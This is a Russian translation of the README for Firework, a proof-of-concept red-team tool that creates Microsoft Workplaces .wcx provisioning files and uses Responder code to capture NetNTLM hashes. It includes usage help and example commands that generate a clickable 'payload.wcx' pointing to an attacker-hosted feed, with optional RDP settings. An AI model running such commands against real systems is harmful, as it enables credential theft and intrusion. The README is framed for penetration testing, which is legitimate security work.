
Firework — это инструмент проверки концепции для взаимодействия с Microsoft Workplaces, создающий корректные файлы, необходимые для процесса подготовки (provisioning).
⚠️ ВНИМАНИЕ: Этот инструмент больше не поддерживается.
Firework — это инструмент для проверки концепции, предназначенный для взаимодействия с Microsoft Workplaces путём создания корректных файлов, необходимых для процесса подготовки. Инструмент также использует некоторый код из Responder, чтобы перехватывать хеши NetNTLM с системы, подготавливающей Workplace-ленту.
Этот инструмент может быть использован в рамках пентеста или команды red team для создания файла .wcx (и связанной ленты), который при щелчке может использоваться для:
Подробное описание и пошаговое руководство читайте в блоге SpiderLabs.
$ pip install -r requirements.txt
.-:::::'::::::::::.. .,::::::.:: . .::: ... :::::::.. ::: .
;;;'''' ;;;;;;;``;;;; ;;;;''''';;, ;; ;;;'.;;;;;;;. ;;;;``;;;; ;;; .;;,.
[[[,,== [[[ [[[,/[[[' [[cccc '[[, [[, [[',[[ \[[,[[[,/[[[' [[[[[/'
`$$$"`` $$$ $$$$$$c $$"""" Y$c$$$c$P $$$, $$$$$$$$$c _$$$$,
888 888 888b "88bo,888oo,__ "88"888 "888,_ _,88P888b "88bo,"888"88o,
"MM, MMM MMMM "W" """"YUMMM "M "M" "YMMMMMP" MMMM "W" MMM "MMP"
usage: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
[-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
[-t CERT] [-k KEY]
Инструмент для работы с WCX
опциональные аргументы:
-h, --help показать это справочное сообщение и выйти
-c COMPANY, --company COMPANY
Название компании
-u URL, --url URL URL ленты
-a APP, --app APP Имя приложения
-e EXT, --ext EXT Расширение приложения
-i ICON, --icon ICON Иконка приложения
-l LISTEN, --listen LISTEN
Порт TLS веб-сервера
-r RDP, --rdp RDP RDP-сервер
-d DOMAIN, --domain DOMAIN
RDP-домен
-n USERNAME, --username USERNAME
RDP-имя пользователя
-p PASSWORD, --password PASSWORD
RDP-пароль
-t CERT, --cert CERT SSL-сертификат
-k KEY, --key KEY SSL-ключ
Базовый пример:
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico
Встроенный веб-сервер запустится на порту 443, если в текущем каталоге присутствуют файлы cert.crt и key.pem. Это вызовет NTLM-запрос от Responder. Если этих файлов нет, инструмент запишет все файлы в локальный каталог для самостоятельного хостинга.
Если вы хотите запустить встроенный веб-сервер на другом порту, используйте флаг -l, как показано ниже:
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443
Вы также можете добавить некоторые настройки в обслуживаемый .rdp-файл.
Примечание: пароли, сохранённые в .rdp-файлах, скорее всего, игнорируются в конфигурации по умолчанию.
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <зашифрованный пароль>
После запуска инструмента в текущий каталог будет записан файл 'payload.wcx'. Этот файл при щелчке запускает процесс подготовки.
Firework
Создано David Middlehurst Copyright (C) 2018 Trustwave Holdings, Inc.
Эта программа является свободным программным обеспечением: вы можете распространять и/или изменять её в соответствии с условиями Стандартной общественной лицензии GNU (GNU General Public License) в версии 3, либо (по вашему выбору) любой более поздней версии.
Эта программа распространяется в надежде, что она будет полезной, но БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ; даже без подразумеваемых гарантий КОММЕРЧЕСКОЙ ЦЕННОСТИ или ПРИГОДНОСТИ ДЛЯ КОНКРЕТНОЙ ЦЕЛИ. Подробнее см. в Стандартной общественной лицензии GNU.